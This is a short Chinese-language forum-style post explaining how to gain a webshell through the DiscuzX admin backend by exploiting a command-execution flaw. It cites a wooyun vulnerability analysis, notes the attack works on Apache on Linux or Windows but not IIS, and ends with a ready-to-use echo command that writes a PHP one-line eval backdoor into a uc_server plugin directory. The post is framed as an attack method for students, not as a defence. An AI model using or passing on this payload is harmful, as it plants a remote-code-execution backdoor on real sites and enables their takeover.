DiscuzX系列后台GETSHELL附方法

最近不少学员来问道 dzx 后台怎么拿WEBSHELL。
最近刚好有个洞洞,不过很多人还是不知道噢,因为很多论坛没有公布具体方法。
wooyun知识库发了恩多Dx的洞洞分析
http://drops.wooyun.org/papers/4611
。。。。。。。。。。。。。。。。。。。
既然可以执行命令。基本上可以拿SHELL
但是有一定的局限。iis基本没权限
linux win Apache的还是可以的
拿webshell方法、如下

echo '^<?php eval($_POST[moon]);?^>' >uc_server/plugin/filecheck/moon.php&